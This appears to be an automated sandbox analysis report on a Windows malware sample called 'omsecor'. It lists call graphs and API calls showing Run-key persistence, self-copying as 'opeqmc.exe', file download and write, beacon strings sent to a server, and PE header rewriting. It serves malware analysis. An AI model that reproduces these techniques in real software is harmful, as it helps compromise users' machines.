4160 40c5b9 SysFreeString 4159->4160 4161 4050fb 4160->4161 4162 40c5b9 SysFreeString 4161->4162 4163 405103 4162->4163 4164 40c5b9 SysFreeString 4163->4164 4165 405109 4164->4165 4166 40c5b9 SysFreeString 4165->4166 4167 405111 4166->4167 4168 40c5b9 SysFreeString 4167->4168 4169 405120 4168->4169 4170->4159 4171 40c43d 4 API calls 4170->4171 4172 4050ce 4171->4172 4173 40c00b 3 API calls 4172->4173 4175 4050e2 4172->4175 4173->4175 4174 40be3a HeapFree 4174->4159 4175->4174 4176 40978d 4177 40979a 4176->4177 4178 409655 __VEC_memcpy 4177->4178 4179 4097b3 4178->4179 4180 4097ba 4179->4180 4181 409655 __VEC_memcpy 4179->4181 4182 4097d6 4181->4182 4183 409805 4182->4183 4184 4097df SysAllocString SysAllocString 4182->4184 4184->4183 3875 40bfd0 3876 40bfd7 3875->3876 3877 40bfda 3875->3877 3878 40bff3 3877->3878 3881 40be27 HeapAlloc 3877->3881 3880 40bffa 3881->3880 3882 40cbd0 3885 40cbfb __except_handler4 3882->3885 3883 40cc74 __except_handler4 3885->3883 3887 40ce9a RtlUnwind 3885->3887 3886 40ccf4 __except_handler4 3887->3886 4185 40c290 4190 40c2b6 4185->4190 4191 40c2ae 4185->4191 4186 40bde1 3 API calls 4186->4190 4187 40c340 4197 40be54 4187->4197 4190->4186 4190->4187 4190->4191 4192 40c05c 4190->4192 4193 40c066 4192->4193 4194 40c06a 4192->4194 4193->4190 4194->4193 4203 40be27 HeapAlloc 4194->4203 4196 40c086 4196->4190 4198 40be73 4197->4198 4199 40be5b 4197->4199 4198->4191 4199->4198 4200 40be3a HeapFree 4199->4200 4201 40be6d 4199->4201 4200->4199 4202 40be3a HeapFree 4201->4202 4202->4198 4203->4196 4204 40d990 4205 40d993 VirtualQuery 4204->4205 4207 40d9b2 4205->4207 4209 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 4205->4209 4208 40d9cc GetVersionExA 4207->4208 4207->4209 4208->4209 4210 409a99 4211 409aa6 4210->4211 4212 409723 __VEC_memcpy 4211->4212 4213 409ac4 4212->4213 4214 409723 __VEC_memcpy 4213->4214 4217 409b18 4213->4217 4215 409ae9 4214->4215 4216 409af2 SysAllocString SysAllocString 4215->4216 4215->4217 4216->4217 4218 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 4219 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 4218->4219 4220 40c519 4227 40c4b4 CoCreateInstance 4220->4227 4223 40c531 VariantInit SysAllocString 4224 40c551 VariantClear 4223->4224 4225 40c589 4223->4225 4224->4225 4228 40c4dd 4227->4228 4228->4223 4228->4225 4229 409f99 Sleep 4230 409fa7 4229->4230 3888 40a65e 3889 40a662 Sleep 3888->3889 3891 406adf 3892 406aec 3891->3892 3893 406b11 RegOpenKeyExW 3892->3893 3894 406b34 3893->3894 3908 406b4f 3893->3908 3909 4069c0 RegQueryValueExW RegCloseKey 3894->3909 3896 406b49 3897 406b78 RegOpenKeyExW 3896->3897 3896->3908 3898 406b96 3897->3898 3901 406ba6 3897->3901 3910 4069c0 RegQueryValueExW RegCloseKey 3898->3910 3900 4069fd 3 API calls 3902 406bc3 3900->3902 3901->3900 3901->3902 3903 406c03 RegOpenKeyExW 3902->3903 3902->3908 3904 406c21 3903->3904 3905 406c31 3903->3905 3911 4069c0 RegQueryValueExW RegCloseKey 3904->3911 3907 4069fd 3 API calls 3905->3907 3905->3908 3907->3908 3909->3896 3910->3901 3911->3905 4231 409021 4232 409025 SysFreeString 4231->4232 4233 40902c 4231->4233 4232->4233 4234 409040 4233->4234 4235 409043 SysFreeString 4233->4235 4236 409058 4233->4236 4234->4235 4237 40912b 4235->4237 4238 409091 GetTickCount 4236->4238 4239 40905f 4236->4239 4245 4090ae 4238->4245 4240 40908f 4239->4240 4241 40906a SysAllocString 4239->4241 4242 409108 SysFreeString 4240->4242 4243 40911b SysFreeString 4240->4243 4241->4239 4242->4242 4242->4243 4243->4237 4244 4090c7 SysAllocString 4244->4245 4245->4240 4245->4244 4246 40d2a4 4247 40d2ac 4246->4247 4248 40d378 __except_handler3 4247->4248 4252 40d790 4247->4252 4251 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 4251->4248 4258 40d110 RtlUnwind 4251->4258 4255 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 4252->4255 4257 40d7e5 _ValidateScopeTableHandlers __except_handler4 __FindPESection 4252->4257 4253 40d99d VirtualQuery 4254 40d9b2 4253->4254 4253->4255 4254->4255 4256 40d9cc GetVersionExA 4254->4256 4255->4251 4256->4255 4257->4253 4257->4255 4258->4251 3912 406a68 RegOpenKeyExW 3913 406a96 3912->3913 3914 406a9a 3912->3914 3918 4069c0 RegQueryValueExW RegCloseKey 3914->3918 3916 406aaa 3916->3913 3917 4069fd 3 API calls 3916->3917 3917->3913 3918->3916 3919 40a469 3920 40a479 3919->3920 3922 40a4dc 3920->3922 3923 40a4ef 3920->3923 3926 40a156 3920->3926 3922->3923 3924 40a530 InternetOpenW 3922->3924 3924->3923 3925 40a545 InternetSetOptionW 3924->3925 3925->3923 3927 40a16a 3926->3927 3930 40a16f 3926->3930 3938 40a0b5 CoInitialize 3927->3938 3932 40a188 SysAllocString 3930->3932 3941 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 3930->3941 3934 40a1b8 3932->3934 3933 40a224 3933->3922 3934->3933 3935 40a1ce FindWindowW 3934->3935 3936 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 3935->3936 3937 40a1de SetParent 3935->3937 3936->3933 3937->3936 3939 40a0cc GetModuleHandleW CreateWindowExW 3938->3939 3940 40a0fd 3939->3940 3940->3930 3942 40a093 3941->3942 3942->3932 3942->3933 3943 4053ea HeapCreate 3944 405408 GetProcessHeap 3943->3944 3945 40541c 3943->3945 3944->3945 3950 405136 3945->3950 3951 405150 3950->3951 3952 4051e0 ExpandEnvironmentStringsW 3951->3952 3953 40520b 3951->3953 3952->3951 3955 405211 3953->3955 3967 40be3a 3953->3967 3956 405229 3955->3956 3957 405238 3956->3957 3958 407b4e 9 API calls 3957->3958 3959 4052e8 3958->3959 3960 406d14 2 API calls 3959->3960 3963 405361 Sleep 3959->3963 3966 405372 3959->3966 3960->3959 3961 40537c Sleep 3961->3966 3963->3959 3964 4053cb Sleep 3964->3966 3965 4053e0 3966->3961 3966->3964 3966->3965 3970 409df4 3966->3970 3968 40be41 HeapFree 3967->3968 3969 40be53 3967->3969 3968->3969 3969->3955 3971 409e01 3970->3971 3983 40beea 3971->3983 3974 409eb1 HttpOpenRequestW 3975 409ead 3974->3975 3977 409ecf HttpSendRequestW 3974->3977 3975->3966 3978 40be3a HeapFree 3977->3978 3979 409eea 3978->3979 3979->3975 3980 409eef InternetReadFile 3979->3980 3980->3975 3981 409f0c 3980->3981 3991 40bf35 3981->3991 3984 40bef4 3983->3984 3995 40beb4 3984->3995 3988 40bf1c 3989 40beb4 WideCharToMultiByte 3988->3989 3990 409e3e InternetConnectW 3988->3990 3989->3990 3990->3974 3990->3975 3992 40bf3a 3991->3992 3993 40bf3f MultiByteToWideChar 3991->3993 3992->3993 3994 40bf58 3993->3994 3994->3975 3996 40bec3 WideCharToMultiByte 3995->3996 3997 40bebe 3995->3997 3998 40bedd 3996->3998 3997->3996 3998->3990 3999 40be27 HeapAlloc 3998->3999 3999->3988 4259 409f2b 4260 409f37 4259->4260 4261 409f40 GetTickCount 4260->4261 4262 409f5f GetTickCount 4261->4262 4263 409f67 PeekMessageW 4262->4263 4266 409fa7 4262->4266 4264 409f88 Sleep 4263->4264 4265 409f7c DispatchMessageW 4263->4265 4264->4262 4265->4263 4267 40d2ac 4268 40d2ca 4267->4268 4270 40d378 __except_handler3 4267->4270 4269 40d790 __except_handler3 2 API calls 4268->4269 4272 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 4269->4272 4272->4270 4273 40d110 RtlUnwind 4272->4273 4273->4272 4000 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 4001 40735e __aulldiv 4000->4001 4002 409c6f 4003 409c90 4002->4003 4004 409c7a SysFreeString 4002->4004 4004->4003 4004->4004 4274 407036 DeleteFileW CreateFileW 4275 407078 GetLastError 4274->4275 4280 40706b 4274->4280 4276 407095 InternetOpenUrlW 4275->4276 4277 407089 SetEndOfFile 4275->4277 4278 4070c6 InternetQueryDataAvailable 4276->4278 4279 4070b8 CloseHandle 4276->4279 4277->4276 4281 407119 InternetReadFile 4278->4281 4279->4280 4282 407123 CloseHandle InternetCloseHandle 4281->4282 4283 4070ed 4281->4283 4282->4280 4283->4282 4284 4070f2 WriteFile 4283->4284 4284->4281 4285 4094b6 4286 4094c9 4285->4286 4287 4094cd 4286->4287 4288 4094f3 CharLowerW CharLowerW 4286->4288 4289 4094e3 SysFreeString 4286->4289 4291 409560 4288->4291 4293 409512 4288->4293 4290 40957e 4289->4290 4292 40956f SysFreeString SysFreeString 4291->4292 4292->4290 4293->4291 4293->4292 4294 40953a CharLowerW 4293->4294 4295 409544 4294->4295 4296 40956a SysFreeString 4295->4296 4296->4292 4005 406c77 RegOpenKeyExW 4006 406c9b 4005->4006 4007 406c9f 4005->4007 4010 4069c0 RegQueryValueExW RegCloseKey 4007->4010 4009 406cb0 4010->4009 4011 40a8f9 4012 40a906 4011->4012 4013 406d14 2 API calls 4012->4013 4014 40a917 Sleep 4012->4014 4015 40a92c 4012->4015 4013->4012 4014->4012 4016 4078cb 12 API calls 4015->4016 4017 40aa37 4016->4017 4018 406cb5 GetVersionExW 4017->4018 4019 40aa52 4018->4019 4020 40a718 5 API calls 4019->4020 4021 40aa7e 4020->4021 4022 40a744 5 API calls 4021->4022 4023 40aa91 4022->4023 4024 406e69 22 API calls 4023->4024 4025 40aabc Sleep 4023->4025 4026 40aae5 GetProcessHeap HeapFree 4023->4026 4027 40a744 5 API calls 4023->4027 4024->4023 4025->4023 4027->4023 4028 40c3f9 4029 40c402 4028->4029 4030 40c407 4028->4030 4031 40c412 wvnsprintfW 4030->4031 4032 40c42e 4031->4032 4299 4091bd 4305 40a582 4299->4305 4301 4091cc 4302 4091d2 4301->4302 4303 409655 __VEC_memcpy 4301->4303 4304 4091eb SysFreeString 4303->4304 4304->4302 4306 40a5a0 4305->4306 4307 40a5a4 4305->4307 4306->4301 4308 40a63f 4307->4308 4311 40a5ae 4307->4311 4309 40a64e SysAllocString 4308->4309 4310 40a63b 4308->4310 4309->4310 4310->4301 4311->4310 4312 40a632 SysFreeString 4311->4312 4312->4310

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 311 40ac0e-40ac18 FindClose 308->311 310 40ac1c-40ac1f 309->310 311->310
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,00000400,?,?,?,0040B3BC,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 26fd06bcf747dc08a64e37c423eb7452492142a7ae799de64f6f1f7aeac1b0c0
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 26fd06bcf747dc08a64e37c423eb7452492142a7ae799de64f6f1f7aeac1b0c0
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • HeapAlloc.KERNEL32(00000000), ref: 0040763F
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                  • CloseHandle.KERNEL32(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
                  • String ID:
                  • API String ID: 1458499590-0
                  • Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 73 409c99-409cac call 40d5b0 76 409cb9 73->76 77 409cae-409cb7 call 405451 73->77 79 409cbb-409cd6 InternetOpenUrlW 76->79 77->79 81 409cd8-409cda 79->81 82 409cdf-409d02 GetProcessHeap HeapAlloc 79->82 83 409df1-409df3 81->83 84 409d04-409d06 82->84 85 409d5b-409d77 InternetReadFile 82->85 86 409def-409df0 84->86 87 409d79-409d90 GetProcessHeap HeapAlloc 85->87 88 409d0b-409d10 85->88 86->83 90 409d92-409d95 87->90 91 409d97-409daa 87->91 88->87 89 409d12-409d1d 88->89 92 409d3d-409d59 call 40c5d0 89->92 93 409d1f-409d3b GetProcessHeap HeapReAlloc 89->93 94 409de0-409dec GetProcessHeap HeapFree 90->94 95 409dd6-409dde 91->95 96 409dac-409dae 91->96 92->85 93->84 93->92 94->86 95->94 96->95 98 409db0-409db6 96->98 98->95 100 409db8-409dca 98->100 100->95 101 409dcc-409dd4 100->101 101->95 101->100
                  APIs
                  • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                  • String ID: hOA
                  • API String ID: 1355009786-3485425990
                  • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                  • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                  • API String ID: 536389180-1762329985
                  • Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                  • Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 185 40a800-40a815 call 405529 182->185 183->185 188 40a823-40a826 call 4056f9 185->188 189 40a817-40a821 185->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                  APIs
                  • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                  • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                  • API String ID: 3100629401-2436734164
                  • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                  • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                  • String ID: UniqueNum
                  • API String ID: 1853814767-3816303966
                  • Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                  • Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 235 407e44-407e4c 230->235 232 407eba 231->232 233 407e7e-407e82 231->233 237 407ebc-407ebe 232->237 233->232 236 407e84 233->236 235->231 235->232 238 407e86-407e8f 236->238 238->238 239 407e91-407ea7 call 405493 238->239 239->232 242 407ea9-407eb8 call 405511 239->242 242->237
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$hOAd$x
